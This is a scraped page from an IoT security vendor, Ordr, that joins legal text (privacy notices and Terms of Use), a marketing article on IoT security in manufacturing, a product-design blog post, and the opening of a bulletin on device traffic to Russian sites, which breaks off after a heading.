The California Consumer Privacy Act requires businesses to disclose whether they sell Personal Data. As a business covered by the CCPA, we do not sell Personal Data. We may share Personal Data with third parties or allow them to collect Personal Data from our sites or Services if those third parties are authorized service providers or business partners who have agreed to our contractual limitations as to their retention, use, and disclosure of such Personal Data, or if you use Ordr sites or Services to interact with third parties or direct us to disclose your Personal Data to third parties.
California law requires that we detail the categories of Personal Data that we disclose for certain "business purposes," such as to service providers that assist us with securing our services or marketing our products, and to such other entities as described in Sections 8 and 10 of this Privacy Statement. We disclose the following categories of Personal Data for our business purposes:
- Identifiers;
- Commercial information;
- Internet activity information;
- Financial information; and
- Inferences drawn from any of the above information categories.
California law grants state residents certain rights, including the rights to access specific types of Personal Data, to learn how we process Personal Data, to request deletion of Personal Data, and not to be denied goods or services for exercising these rights.
If you are a California resident under the age of 18, you may ask us to remove content or information that you have posted to our website(s). Please note that your request does not ensure complete or comprehensive removal of the content or information, because, for example, some of your content may have been reposted by another user.
For information on how to exercise your rights, please refer to Section 15 of this Privacy Statement. If you are an authorized agent wishing to exercise rights on behalf of a California resident, please contact us using the information in the "Contacting Us" section above and provide us with a copy of the consumer's written authorization designating you as their agent.
We may need to verify your identity and place of residence before completing your rights request.
Notice of Privacy Rights to Residents of the European Economic Area
You have the right to ask us not to process your personal data for marketing purposes. We will usually inform you (before collecting your data) if we intend to use your data for such purposes or if we intend to disclose your information to any third party for such purposes. You can exercise your right to prevent such processing by checking certain boxes on the forms we use to collect your data. You can also exercise the right at any time by contacting us at notices@Ordr.net.
How to Contact Us
If you have questions or complaints regarding Ordr's Privacy Policy or practices, please contact notices@Ordr.net or via postal mail at
Ordr, Inc.
2445 Augustine Dr.
#601
Santa Clara, CA 95054
Attention: Privacy Officer
Terms of Use
Last Updated: September 27, 2022
PLEASE NOTE THAT YOUR USE OF AND ACCESS TO OUR WEBSITE (DEFINED BELOW) ARE SUBJECT TO THE FOLLOWING TERMS; IF YOU DO NOT AGREE TO ALL OF THE FOLLOWING, YOU MAY NOT USE OR ACCESS THE WEBSITE IN ANY MANNER.
Welcome to Ordr, Inc.'s website. Please read on to learn the rules and restrictions that govern your use of our website(s) (the "Website"). If you have any questions, comments, or concerns regarding these terms or the Website, please contact us at info@ordr.net.
These Terms of Use (the "Terms") are a binding contract between you and Ordr, Inc. ("Ordr," "we" and "us"). You must agree to and accept all of the Terms, or you don't have the right to use the Website. If you use the Website in any way, you agree to all of these Terms, and these Terms will remain in effect while you use the Website. These Terms include the provisions in this document, as well as those in the Ordr Privacy Policy.
Will these Terms ever change?
We are constantly trying to improve our Website, so these Terms may need to change along with the Website. We reserve the right to change the Terms at any time, but if we do, we will bring it to your attention by placing a notice on the Website, and/or by sending you an email and/or by some other means.
If you don't agree with the new Terms, you are free to reject them; unfortunately, that means you will no longer be able to use the Website. If you use the Website in any way after a change to the Terms is effective, that means you agree to all of the changes.
Except for changes by us as described here, no other amendment or modification of these Terms will be effective unless in writing and signed by both you and us.
What about my privacy?
Ordr takes the privacy of its users very seriously. The current Ordr Privacy Policy is posted on www.ordr.net.
The Children's Online Privacy Protection Act ("COPPA") requires that online service providers obtain parental consent before they knowingly collect personally identifiable information online from children who are under 13. We do not knowingly collect or solicit personally identifiable information from children under 13; if you are a child under 13, please do not attempt to use the Website or send any personal information about yourself to us. If we learn we have collected personal information from a child under 13, we will delete that information as quickly as possible. If you believe that a child under 13 may have provided us personal information, please contact us at info@ordr.net.
What are the basics of using the Website?
You represent and warrant that you are of legal age to form a binding contract (or if not, you've received your parent's or guardian's permission to use the Website and gotten your parent or guardian to agree to these Terms on your behalf). If you're agreeing to these Terms on behalf of an organization or entity, you represent and warrant that you are authorized to agree to these Terms on that organization or entity's behalf and bind them to these Terms (in which case, the references to "you" and "your" in these Terms, except for in this sentence, refer to that organization or entity).
You will only use the Website for your own internal, personal, non-commercial use, and not on behalf of or for the benefit of any third party, and only in a manner that complies with all laws that apply to you. If your use of the Website is prohibited by applicable laws, then you aren't authorized to use the Website. We can't and won't be responsible for your using the Website in a way that breaks the law.
Your use of the Website is subject to the fact that You represent, warrant, and agree that You will not contribute any Content or User Submission (each of those terms is defined below) or otherwise use the Website or interact with the Website in a manner that:
(a) Infringes or violates the intellectual property rights or any other rights of anyone else (including Ordr);
(b) Violates any law or regulation;
(c) Is harmful, fraudulent, deceptive, threatening, harassing, defamatory, obscene, or otherwise objectionable;
(d) Violates the security of any computer network, or cracks any passwords or security encryption codes;
(e) Runs Maillist, Listserv, any form of auto-responder or "spam" on the Website, or any processes that run or are activated while you are not logged into the Website, or that otherwise interfere with the proper working of the Website (including by placing an unreasonable load on the Website infrastructure);
(f) "Crawls," "scrapes," or "spiders" any page, data or portion of or relating to the Website or Content (through use of manual or automated means);
(g) Copies or stores any significant portion of the Content and/or share, post or distribute any significant portion of the Content elsewhere;
(h) Decompiles, reverse engineers, or otherwise attempts to obtain the source code or underlying ideas or information of or relating to the Website.
A violation of any of the foregoing is grounds for termination of your right to use or access the Website.
What are my rights in the Website?
The materials displayed or performed or available on or through the Website, including, but not limited to, text, graphics, data, articles, photos, images, illustrations, user submissions, and so forth (all of the foregoing, the "Content") are protected by copyright and/or other intellectual property laws. You promise to abide by all copyright notices, trademark rules, information, and restrictions contained in any Content you access through the Website, and you won't use, copy, reproduce, modify, translate, publish, broadcast, transmit, distribute, perform, upload, display, license, sell or otherwise exploit for any purpose any Content not owned by you, (i) without the prior consent of the owner of that Content or (ii) in a way that violates someone else's (including Ordr's) rights.
You understand that Ordr owns the Website. You won't modify, publish, transmit, participate in the transfer or sale of, reproduce (except as expressly provided in this Section), create derivative works based on, or otherwise exploit any of the Website.
The Website may allow you to copy or download certain Content; please remember that just because this functionality exists, doesn't mean that all the restrictions above don't apply; they do!
Who is responsible for what I see and do on the Website?
You access all information and content posted or transmitted through the Website at your own risk, and we aren't liable for any errors or omissions in that information or content or for any damages or loss you might suffer in connection with it. We cannot control and have no duty to take any action regarding how you may interpret and use the Content or what actions you may take as a result of having been exposed to the Content, and you hereby release us from all liability for you having acquired or not acquired Content through the Website. We can't guarantee the identity of any users with whom you interact in using the Website and are not responsible for which users gain access to the Website.
You are responsible for all Content you provide, in any manner, via the Website, and you represent and warrant you have all rights necessary to do so, in the manner in which you provide it. You are responsible for all your activity in connection with the Website.
The Website may contain links or connections to third party websites or services that are not owned or controlled by Ordr. When you access third party websites or use third party services, you accept that there are risks in doing so, and that Ordr is not responsible for such risks. We encourage you to be aware when you leave the Website and to read the terms and conditions and privacy policy of each third party website or service that you visit or utilize.
Ordr has no control over, and assumes no responsibility for, the content, accuracy, privacy policies, or practices of or opinions expressed in any third party websites or by any third party that you interact with or find through the Website. In addition, Ordr will not and cannot monitor, verify, censor or edit the content of any third party site or service.
By using the Website, you release and hold us harmless from any and all liability arising from your use of any third party website or service.
If there is a dispute between users of the Website, or between users and any third party, you agree that Ordr is under no obligation to become involved. In the event that you have a dispute with one or more other users, you release Ordr, its officers, employees, agents, and successors from claims, demands, and damages of every kind or nature, known or unknown, suspected or unsuspected, disclosed or undisclosed, arising out of or in any way related to such disputes and/or our Website. If you are a California resident, you shall and hereby do waive California Civil Code Section 1542, which says: "A general release does not extend to claims which the creditor does not know or suspect to exist in his favor at the time of executing the release, which, if known by him must have materially affected his settlement with the debtor."
Will Ordr ever change the Website?
We are always trying to improve the Website, so it may change over time. We may suspend or discontinue any part of the Website, or we may introduce new features or impose limits on certain features or restrict access to parts or all of the Website. We'll try to give you notice when we make a material change to the Website that would adversely affect you, but this isn't always practical. Similarly, we reserve the right to remove any Content from the Website at any time, for any reason (including, but not limited to, if someone alleges you contributed that Content in violation of these Terms), in our sole discretion, and without notice.
What if I want to stop using the Website?
You're free to do that at any time, by contacting us at info@ordr.net; please refer to our Privacy Policy, as well as these Terms of Use, to understand how we treat information you provide to us after you have stopped using our Website.
Ordr is also free to terminate (or suspend access to) your use of the Website for any reason in our discretion, including your breach of these Terms. Ordr has the sole right to decide whether you are in violation of any of the restrictions set forth in these Terms.
Provisions that, by their nature, should survive termination of these Terms shall survive termination. By way of example, all of the following will survive termination: any obligation you have to indemnify us, any limitations on our liability, any terms regarding ownership or intellectual property rights, and terms regarding disputes between us.What else do I need to know?
Warranty Disclaimer. Ordr does not make any representations or warranties concerning any content contained in or accessed through the Website, and we will not be responsible or liable for the accuracy, copyright compliance, legality, or decency of material contained in or accessed through the Website. We make no representations or warranties regarding suggestions or recommendations of services or products offered or purchased through the Website. Services purchased or offered (whether or not following such recommendations and suggestions) through the Website are provided "AS IS" and without any warranty of any kind from Ordr or others (unless, with respect to such others only, provided expressly and unambiguously in writing by a designated third party for a specific product). THE WEBSITE AND CONTENT ARE PROVIDED ON AN "AS-IS" BASIS, WITHOUT WARRANTIES OF ANY KIND, EITHER EXPRESS OR IMPLIED, INCLUDING, WITHOUT LIMITATION, IMPLIED WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE, NON-INFRINGEMENT, OR THAT USE OF THE WEBSITE WILL BE UNINTERRUPTED OR ERROR-FREE. SOME STATES DO NOT ALLOW LIMITATIONS ON HOW LONG AN IMPLIED WARRANTY LASTS, SO THE ABOVE LIMITATIONS MAY NOT APPLY TO YOU.
Limitation of Liability. TO THE FULLEST EXTENT ALLOWED BY APPLICABLE LAW, UNDER NO CIRCUMSTANCES AND UNDER NO LEGAL THEORY (INCLUDING, WITHOUT LIMITATION, TORT, CONTRACT, STRICT LIABILITY, OR OTHERWISE) SHALL ORDR BE LIABLE TO YOU OR TO ANY OTHER PERSON FOR (A) ANY INDIRECT, SPECIAL, INCIDENTAL, OR CONSEQUENTIAL DAMAGES OF ANY KIND, INCLUDING DAMAGES FOR LOST PROFITS, LOSS OF GOODWILL, WORK STOPPAGE, ACCURACY OF RESULTS, OR COMPUTER FAILURE OR MALFUNCTION, OR (B) ANY AMOUNT, IN THE AGGREGATE, IN EXCESS OF THE GREATER OF (I) $100 OR (II) THE AMOUNTS PAID BY YOU TO ORDR IN CONNECTION WITH THE WEBSITE IN THE TWELVE (12) MONTH PERIOD PRECEDING THIS APPLICABLE CLAIM, OR (III) ANY MATTER BEYOND OUR REASONABLE CONTROL. SOME STATES DO NOT ALLOW THE EXCLUSION OR LIMITATION OF CERTAIN DAMAGES, SO THE ABOVE LIMITATION AND EXCLUSIONS MAY NOT APPLY TO YOU.
Indemnity. You agree to indemnify and hold Ordr, its affiliates, officers, agents, employees, and partners harmless for and against any and all claims, liabilities, damages (actual and consequential), losses and expenses (including attorneys' fees) arising from or in any way related to any third party claims relating to (a) your use of the Website (including any actions taken by a third party on your behalf or at your direction), and (b) your violation of these Terms. In the event of such a claim, suit, or action ("Claim"), we will attempt to provide notice of the Claim to the contact information we have for you (provided that failure to deliver such notice shall not eliminate or reduce your indemnification obligations hereunder).
Assignment. You may not assign, delegate or transfer these Terms or your rights or obligations hereunder, in any way (by operation of law or otherwise) without Ordr's prior written consent. We may transfer, assign, or delegate these Terms and our rights and obligations without consent.
Choice of Law; Arbitration. These Terms are governed by and will be construed under the laws of the State of California, without regard to the conflicts of laws provisions thereof. Any dispute arising from or relating to the subject matter of these Terms shall be finally settled in San Francisco County, California, in English, in accordance with the Streamlined Arbitration Rules and Procedures of Judicial Arbitration and Mediation Services, Inc. ("JAMS") then in effect, by one commercial arbitrator with substantial experience in resolving intellectual property and commercial contract disputes, who shall be selected from the appropriate list of JAMS arbitrators in accordance with the Arbitration Rules and Procedures of JAMS. Judgment upon the award rendered by such arbitrator may be entered in any court of competent jurisdiction. Notwithstanding the foregoing obligation to arbitrate disputes, each party shall have the right to pursue injunctive or other equitable relief at any time, from any court of competent jurisdiction. For all purposes of this Agreement, the parties consent to exclusive jurisdiction and venue in the state or federal courts located in, respectively, Santa Clara County, California, or the Northern District of California.
Miscellaneous. You will be responsible for paying withholding, filing, and reporting all taxes, duties, and other governmental assessments associated with your activity in connection with the Website, provided that Ordr may, in its sole discretion do any of the foregoing on your behalf or for itself as it sees fit. The failure of either you or us to exercise, in any way, any right herein shall not be deemed a waiver of any further rights hereunder. If any provision of this Agreement is found to be unenforceable or invalid, that provision will be limited or eliminated, to the minimum extent necessary, so that these Terms shall otherwise remain in full force and effect and enforceable. You and Ordr agree that these Terms are the complete and exclusive statement of the mutual understanding between you and Ordr, and that it supersedes and cancels all previous written and oral agreements, communications and other understandings relating to the subject matter of these Terms, and that all modifications to these Terms must be in a writing signed by both parties (except as otherwise provided herein). No agency, partnership, joint venture, or employment is created as a result of these Terms and you do not have any authority of any kind to bind Ordr in any respect whatsoever. You and Ordr agree there are no third party beneficiaries intended under this Agreement.
IoT in Manufacturing: How OT/IT Convergence is Changing the Industry
The Internet of Things (IoT) and other connected devices have been integral to the efficient operation of manufacturing lines for decades. Security of the production line was maintained by isolating equipment in what was known as the Purdue Methodology: air gapping the network to keep it out of reach from threat actors. But as digital supply chains required hyperconnectivity to enable data exchange and greater levels of automation, the air gap was bridged, and manufacturers became vulnerable. A new Purdue Method is needed.
Fortunately, the means to protect connected devices on the production line is available. The following article offers insights and best practices to help guide an IoT security strategy for manufacturers.
The use of IoT in manufacturing continues to accelerate and evolve, as do the threats that come with the convergence of OT and IT. Recently, NSA and CISA released an alert warning manufacturers of potential security vulnerabilities in their OT systems. The alert cited an increase in the number of threats to OT assets including ransomware, spear phishing attacks, and the modification of control logic parameters, among others.
The primary driver of the emerging threats to OT is the unification of OT devices and systems with IT and IoT, or as NSA describes it, the proliferation of "internet accessible operational technology." This increase in the number of OT devices and systems that integrate with IT is the result of developments in technology, evolving features and capabilities, the movement of network access control vendors into OT, as well as mergers and acquisitions.
In this article, we look at some of the use cases for IoT in manufacturing, as well as the challenges and opportunities that manufacturers face at the intersection of OT/IT. But first, a couple of quick definitions.
What is IoT in manufacturing?
IoT in manufacturing is the subset of the industrial internet of things (IIoT) specific to manufacturing applications. IIoT is the network of sensors and devices that connect to computer systems and industrial software applications.
While IIoT refers to industries such as retail, utilities, or transport, IoT in manufacturing specifically applies to the Internet-connected sensors and devices used to track and produce goods more efficiently.
Both IoT in manufacturing and IIoT are themselves part of the broader internet of things (IoT), which comprises all the internet connected devices and sensors across domains. When people talk about IoT in practice, however, they're typically referring to consumer applications, such as smart home devices, so we'll stick to using the term IIoT for the sake of clarity.
What is operational technology (OT)?
Operational technology (OT) consists of hardware and software components that monitor, control, and create changes in industrial equipment, devices, assets, processes, or events. OT technology systems may control industrial elements such as engines, conveyors, valves, or machines that are directly connected to the manufacturing process.
While OT systems were once commonly siloed from IT (or at least thought of as distinct from IT), the present trend is toward more integration of IT and OT systems. Three primary factors are driving this convergence of IT/OT:
- Increased reliance on/availability of remote operations and monitoring
- Outsourcing OT asset management and/or maintenance
- Decentralized workforces
The trend toward more unified OT/IT systems and greater IoT connectivity in manufacturing brings new capabilities and control for manufacturers, but also some risks. In the next section, we'll explore some IoT in manufacturing use cases, benefits and challenges, as well as some of the ways manufacturers can mitigate these risks.
Use cases: IoT in Manufacturing
The digital transformation of the manufacturing industry is changing the way production environments and supply chains work by improving efficiencies, automating processes, and adding intelligence.
But challenges accompany these opportunities, and manufacturers will need a strategy if they are to successfully capitalize on these benefits without compromising security or efficiency. Before we look at some specific use cases, it's important to consider some of the needs manufacturers will face as IT/OT continue to converge:
- Visibility: Decisions about which OT devices and systems will be used are increasingly being made by multiple stakeholders in the supply chain. Manufacturers need visibility into all of these devices, as well as a system for asset discovery, classification, and segmentation for those with security vulnerabilities.
- Compliance: IoT, IT, and OT compliance depends on navigating an increasingly complex system of regulations. Understanding which devices are governed by each specific set of standards can help manufacturers cultivate robust security and remain in compliance.
- Efficiency: Aging devices put manufacturers at risk of losing efficiency as operating systems become obsolete or outdated. Recognizing which devices can still be secured can increase their longevity and avoid downtime.
- Intellectual property: As the number of attacks on OT and IoT devices continues to increase, manufacturers are at increased risk for theft of intellectual property. Manufacturers need a strategy for identifying business-critical devices and flagging abnormal behavior in order to protect their most valuable assets.
Manufacturers already rely on IoT devices and connectivity to drive production, quality control, and machine utilization, and additional use cases continue to evolve as OT/IT merge. These include the rise of predictive maintenance, real-time monitoring, remote management, and the collection of consumer insights.
Predictive maintenance
With the aid of sensors and the increase in data from manufacturing equipment, companies can now detect and predict failure before it occurs. For example, an analytical model may find that a machine has a high probability of failing when it breaches a specific temperature threshold. With this information, the monitoring applications can alert the machine operators when the event occurs, and they can then promptly replace it before causing larger issues with production.
According to Fortune Business Insights, the global market for predictive maintenance is expected to grow at a CAGR of 29.8% through 2026. That makes predictive maintenance one of the most rapidly expanding aspects of IIoT technology.
Monitoring in real time
Anyone in the production process can have access to data in real-time, which means anticipating and rapidly responding to changes or incidents that may impact production. Ultimately, this kind of real-time monitoring helps prevent down time and speeds up production.
Remote management
IIoT connected devices and digitally controlled machinery allow for fully remote operation of a production line. Many businesses choose a hybrid approach, in which some parts of the production line are automated and/or remotely controlled, with others operated by humans. Remote management has become more prevalent now that workforces are becoming less centralized.
Supply chain asset management and tracking
IIoT devices can help businesses understand how different parts of the supply chain are operating by tracking and monitoring how both raw materials and finished products move through the different production and transportation processes. This can not only help understand the overall state of production, but also glean insights into areas that could be optimized or costs that could be reduced.
For example, a complex supply chain may receive raw materials from numerous different vendors. A backup in just one of these deliveries can cause a bottleneck in production and cause expensive delays. By tracking how all materials are moving through the organization, management can quickly understand exactly where the issue is and make necessary adjustments to resolve it before causing larger delays.
Digital twins
Digital twins are computer-modeled simulations of a physical object or process. For example, a 3-D model of a building is a digital twin of the actual facility. While traditionally used to plan the structure and characteristics of a physical manufactured product, a digital twin can be used in conjunction with IoT systems to map out the digital representation of a production line to test and simulate changes to the manufacturing processes. Digital twins can also be used to mirror processes and model diagnostics.
For example, a business may want to understand the effect of changing the speed of a specific process. Using a digital twin and data from IIoT sensors, it could instead run a computer simulation to understand the impact of the speed change on the rest of the production line.
Building and operational systems
Manufacturing environments include a variety of operational technologies and devices, including HVAC, surveillance, access control, and energy systems. IIoT systems can be added to these to monitor their status and even adjust them remotely.
By doing so, these operational technologies can become intertwined with the broader supply chain and digital models. For instance, the climate systems may have an effect on the quality of the production process and therefore that data can be combined with the machinery data to run predictive maintenance and other types of models that may otherwise be difficult without the environmental context.
Collecting consumer insights
Manufacturers can use connected tools to gather data on consumer usage and track demand patterns. As a result, business managers remain agile and able to adjust the product to stay ahead of these trends. This increased responsiveness allows even large companies to be nimble and maximize customer satisfaction.
Challenges to IIoT in manufacturing
The merging of OT and IT technologies, as well as the increased accessibility of IoT devices present manufacturers with opportunities to minimize disruptions, streamline production, remotely access and monitor data, and ultimately drive revenue. But there are other considerations that manufacturers must take into account if they are to fully realize all the potential that OT, IT, and IoT offer.
Security & threat protection
According to Gartner, 75% of all OT security solutions will be provided by multifunction platforms that integrate with IT by 2025. With the exponential growth of connected devices in manufacturing facilities, these IIoT devices create an expanded attack surface. Threat prevention will become even more important as more OT devices interface with IT.
The threat of attacks has far reaching implications for manufacturers: in addition to disrupting production processes, attacks can also impact revenue and, in the worst-case scenario, compromise employee safety on the manufacturing floor. The security of these devices is critical to maximize uptime and optimize manufacturing processes, particularly as many remain in service for years and may become more vulnerable to attacks as they age.
Asset management
Manufacturers have an increasingly large inventory of assets to discover, evaluate, classify, and manage. The proliferation of IoT-accessible OT devices will only increase as the number of decision-makers in the supply chain expands, remote management of facilities and processes becomes more prevalent, and workforces become less centralized. Knowing exactly which assets are vulnerable is critical for providing adequate security measures and for maintaining production processes.
Operational resilience
According to a recent Gartner Risk Management Survey, one of the most common risk priority areas identified by respondents is the need for improved operational resilience for OT systems. That means understanding risks, anticipating potential disruptions, and planning for business continuity in the event of an incident, attack, or other breakdown in the production process. As the number of internet accessible OT devices increases, planning for operational resilience will become more complex.
Regulatory compliance
The patchwork of regulations governing OT/IT/IoT devices can be particularly challenging for manufacturers, and this problem will only continue as more and more devices and processes are integrated into the IIoT. Being able to map each device or component to the correct regulations plays a critical role in maintaining security and meeting regulatory requirements.
Secure all your connected devices
Manufacturing companies are embracing the convergence of IT and OT in hopes of capitalizing on the benefits brought by internet accessible OT devices. These benefits include more control over production processes, access to real-time data from remote locations, the ability to decentralize their workforce, and improved efficiencies that drive revenue growth.
As more OT devices become IoT-compatible, and as OT and IT security protocols continue to merge, manufacturers should have a plan for discovering and assessing all of their connected devices, including those used throughout their supply chains.
Most importantly, these devices must be evaluated and secured against the growing threat of security breaches. Ordr Systems Control Engine (SCE) can enable visibility and security of all your connected manufacturing devices. Try a demo of Ordr to learn how to keep your manufacturing devices, and the data they collect and share, safe and secure.
Design Thinking: How to Make Complex Data, Simply Useful
By Pandian Gnanaprakasam
Introduction
As Ordr has gained momentum over the years, the breadth and depth of our data lake have exponentially grown, with more customers adopting Ordr and extending our solution to protect more parts of their environments. More customers and more departments of each customer's environment mean more devices, which means more data being ingested to our platform. The growth of our data lake can also be attributed to more external inputs as we increasingly take in new sources of device context data to provide deeper insights and help our customers understand risk.
The rate of data growth we have seen creates unique challenges on the visualization side. Recently we paused to think about how our solution could better organize and present vast amounts of rich analytical data in a way that is both accessible and valuable for our users. It is truly an art to balance the desire for simplicity with the appetite for the rich context that goes with it.
As our user base expands to new roles and personas, the product must adapt to different outcomes relevant to each user. Each user's level of expertise and area of interest may vary, and workflows must cater to these users seamlessly. A product must meet the needs of different roles without the need to fork and build a dedicated version to satisfy the diverse needs of each user. This daunting task is less often discussed but is nevertheless critical to maximizing value for users.
With full awareness of our challenge, we set off to radically improve how we present our ever-increasing data in the most impactful, simple way to our expanding universe of users.
The Approach
As part of our product design process, we decided on an iterative approach called "design thinking," a process defined as:
A bottom-up, non-linear, team-based iterative process that seeks to understand and empathize with users deeply, challenge existing assumptions, redefine problems, and brainstorm innovative solutions to prototype and test with customers.
Design thinking gave us a framework of 5 stages that include:
Empathize > Define > Ideate > Prototype > Test
With the design thinking framework, we set up a series of workshops and enrolled a range of users from our customers and prospects representing a variety of user roles to provide us both depth and breadth of insights and feedback we needed to collect requirements.
We started the process by asking our users the simple question:
How can we design a better user experience to make the data we provide in Ordr simple to understand and valuable for you and your role?
Some of the key requirements we heard from our design partners included:
- Organize information to fit my role and help me filter out the noise so I can focus on the information I need.
- Surface insights most relevant to my role and make them clear. Insights are the road signs that help me make decisions as I look at data.
- Allow me to "shape" and organize data to fit my needs in a fast and fluid way.
- Help me maintain the context of my data so I don't "lose my place" as I move around the application.
- Let me see different views so I can analyze data from different perspectives and uncover insights that might otherwise be missed.
- Prioritize content over color to help me understand the structure of my data without unnecessary visual distractions.
The New Model Emerges
A key takeaway from the workshops was understanding that one user's noise is often another user's signal. It was clear that the new model needed to present data in a simple, customizable way without sacrificing the impact or richness of the data.
A query language approach is a good option, but it could not address the signal-to-noise problem without impacting other user requirements we had gathered during the workshops. For a query language approach to be successful, a user needs to know what they're looking for and needs to become proficient in the new syntax and semantics of the language. This impacts adoption and time to value, two things we were not willing to sacrifice.
Our analytics engine is rooted in the foundational principle of surfacing a constant stream of prioritized insights in real-time vs. waiting for a user to "ask" for data using a query. In our view, the solution would come from a comprehensive understanding of the intersection between increasing data richness and a variety of UI/UX information retrieval approaches working together to achieve the desired result.
Pillars of the Model
From our learnings in the workshops, we defined the following seven pillars that guided the design of the UI/UX presentation model.
PILLAR 1: Create a clear consolidated experience for each role
Our users have distinct roles, backgrounds, traits, abilities, and dispositions. We expect this diversity will continue to expand and increase in complexity.
Scoping data coming into the UI based on a user role allows us to reduce the less relevant data (noise) and deliver a clean baseline of data (signal) for each user. With this in mind, we established a persona-based user experience, which requires filtering data from the data lake for a specific role and persona.
Persona-based filtering is easier said than done. The whole platform needs to run dynamic queries in the backend to customize itself on the fly. For example:
- An inventory and asset management workflow requires data on devices and relevant vulnerabilities.
- A security incident response workflow requires data on the latest alarms across all assets.
- A forensics workflow requires data on traffic flows and patterns.
For example, we designed a user role for Healthcare Technology Management (HTM) that switches the entire UI dashboard and shows only data relevant to their role and daily workflow needs.
The UI adapts to these wildly diverse use cases and data requirements while catering to each user's role.
PILLAR 2: Provide each user with contextual insights
Insights offer users top-level guidance like a road sign to separate the signal from the noise. Our model uses computationally intensive methods to surface insights in real-time, tailored explicitly for each role.
Each user requires a different dashboard and depth of context for the workflow they are interested in to be presented as top-level data.
PILLAR 3: Allow each user to shape data relevant to their role
Data Shaping controls the scope of data allowing each user to either explore data or "set and forget" a view for specific workflows. Data Shaping reduces clutter by reducing the number of devices displayed, making it easier to slice and dice the data more cleanly.
For example, in our system, setting the data shaper to a specific location only shows the devices in that location and associated data. Whether the user is in a sub-section of the product or moving across the hundreds of panels, they see only data relevant to that location.
Another example is a radiology technician using the shaper to focus on radiology-related devices. The entire product today customizes itself to radiology devices across all panels and screens. That radiology technician can now work on security, traffic analytics, vulnerability management, risk management, or policy provisioning without being shown the "noise" created by other non-radiology devices.
PILLAR 4: Enable context-aware search across the entire UI
When the data set accumulates over time into several terabytes, a generic search that takes several seconds to respond does not usually make for a good user experience. Tailoring the search function to the panel the user is currently focused on shrinks the data set to be searched and narrows the search parameters, resulting in faster query times as well as a better user experience.
As an example, in each table and each panel, search parameters differ as follows:
- Device detail table provides a search function on thousands of device attributes.
- The security alarm panel provides a search capability using alarm categories as parameters.
- The traffic analytics panel provides a search capability related to traffic/flow parameters.
- The application panel provides a search based on destination URL or application protocol details like port numbers.
- Search is enabled in every column of a table, with parameters scoped to that column, for a further quick deep dive into the data.
Implementing context-aware search in each panel when there are hundreds of panels is a huge undertaking. But now that it is designed in, it is well worth the effort to minimize complexity for the user.
PILLAR 5: Allow users to easily share findings and views
Once a user has reduced a view to a list of devices that need further action, that view, including the entire context, can be easily shared with others as a URL. Another user clicking that URL comes back to the same screen with a list of devices without having to search and filter for attributes. This is a perfect example of how context gets naturally amplified with the power of sharing. Our system today allows users to save the context at various places in the navigation workflow and share it with their colleagues.
PILLAR 6: Allow users to enforce policies quickly without losing context
The action framework allows users to take quick action on any device, alarm, or vulnerability without losing context in the UI. For example, today with this release, a user can identify a list of vulnerable devices and move that complete list to a quarantine VLAN with a single click. Another example is to easily clear a series of alarms associated with devices that have the same make and model with one click. Invoking an action that requires multiple steps in sequence right within the current context, without losing focus, is critical to getting workflows accomplished quickly.
PILLAR 7: Allow users to define their own region/location for easy aggregation
Ordr gathers location information from various sources including switches, access points, and network management systems. Device location is extremely granular in Ordr and is helpful to track a device as it moves through an organization or locates a device that has gone missing. It is critical to know exactly where a device that is affected by malware/ransomware is connected in the network (switch/port or AP/SSID or VPN (Virtual Private Network) or external).
But for manageability purposes, users want to use location to view all devices in a specific region, site, or location within that site. A location means something different from user to user, so customization is critical. The need to present data based on business function was a key driver for this, and it avoids all the clutter. For example, a user responsible for the Phoenix division can use location to focus on the devices in the Phoenix location only and not have to see devices in other locations. Our ability to aggregate micro-locations into administrative regions is very well received by our customers, given the distributed nature of the various hospital chains as well as the continuous changes in organizational hierarchy due to mergers and acquisitions.
Combining the Pillars
Ordr provides users with details on over a thousand attributes for each device. Attributes include details such as device OS, software stack, vulnerabilities, where the device connects from, connection methods, what the device communicates with internally and externally, risks based on behavior, context information from various tools, and users who have logged into the device.
Ordr is indeed a complex and dynamic system with vast amounts of data and potentially limitless insights. Using all seven pillars in combination, we believe our approach dramatically improves the signal for each user and does so in the context of their specific workflows to ensure they can use our platform and insights efficiently. This platform approach also supports our quest to make the complex problem of securing every connected device simple.
We recently launched Ordr 8 Clinical Defender with persona-based workflows designed for healthcare HTM users. With this new release, we applied the pillar framework above and created a foundation for a scalable platform that will produce many persona-based workflows operating on a single customizable and robust backend data set.
We received some excellent feedback as we shared our latest release and here are some of the things we heard:
“It is refreshing to work with a vendor that listens and empathizes with issues and pain points from customers. It’s exciting to see the rubber meet the road regarding suggestions and requests.”
“Loved what I saw in the review of new GUI.”
“Data shaper simplifies my current operation dramatically.”
“I like simplified search and its consistency throughout the product.”
“Location-based shaper is huge both for remote clinic management and for M&A (Mergers & Acquisitions) situations.”
Moving forward, we will keep working with our customers and prospects as design partners in this “design thinking” framework to continually evolve our platform. In the end, it is all the constant customer feedback that makes Ordr an excellent product.
We will be back soon with more updates on how the Ordr platform continues to evolve.
Pandian Gnanaprakasam
Pandian has more than 20 years of product and engineering leadership experience and is also a serial entrepreneur. Before founding Ordr, he was the Chief Development Officer at Aruba, responsible for all of engineering and product management functions. Aruba, an enterprise mobile wireless company, was acquired by HPE for $3 Billion in March 2015. Before Aruba, Pandian served as the head of engineering for Cisco’s multi-billion-dollar Wi-Fi business unit and before that as VP of engineering for low-end switching product lines. He graduated with a master’s degree in Electrical Engineering from IIT, Chennai, India and holds several patents to his credit in various networking technologies.
Security Bulletin
Understanding The Threat of Device Communications to Russia
8 Min Read | By Pandian Gnanaprakasam
As the war in Ukraine broke out in late February, security teams around the globe took notice. Russia has long been a focus in the fight against cybercrime, and its aggression raised concerns to new levels, with fears that cyberattacks could increase with a focus on the US and other western countries. On March 21, 2022, President Biden confirmed the rising concerns with a statement warning of a potential increase in Russian cyber activity targeting the US, allies, and partners. As organizations across the globe were taking steps to improve cyber defenses, we heard from many of our customers asking what Ordr could do to help improve security, threat prevention, and the ability to monitor their environments. A primary requirement was the ability to identify devices in their environments that had communicated with potentially malicious Russian sites.
By continuously analyzing network data, Ordr uncovers all connected device communications within an organization as well as communications to external sites. We also assess the risk for these communications and provide that insight to every customer in our UI. To make these insights a little easier to access, we created a focused report that our customers could run to get a quick view of the exact flow level details of medical devices communicating with Russian sites and assess the risk. You can learn more about the report in this video:
While our customers could collect some of this data from various tools across their environment, only Ordr combines communication insights with device context. This triangulation methodology from multiple sources helps them understand the risk of communication and provides them with the details needed to pinpoint the device at risk and quickly craft the proper response to eliminate the threat.
Helping Everyone Understand the Risk
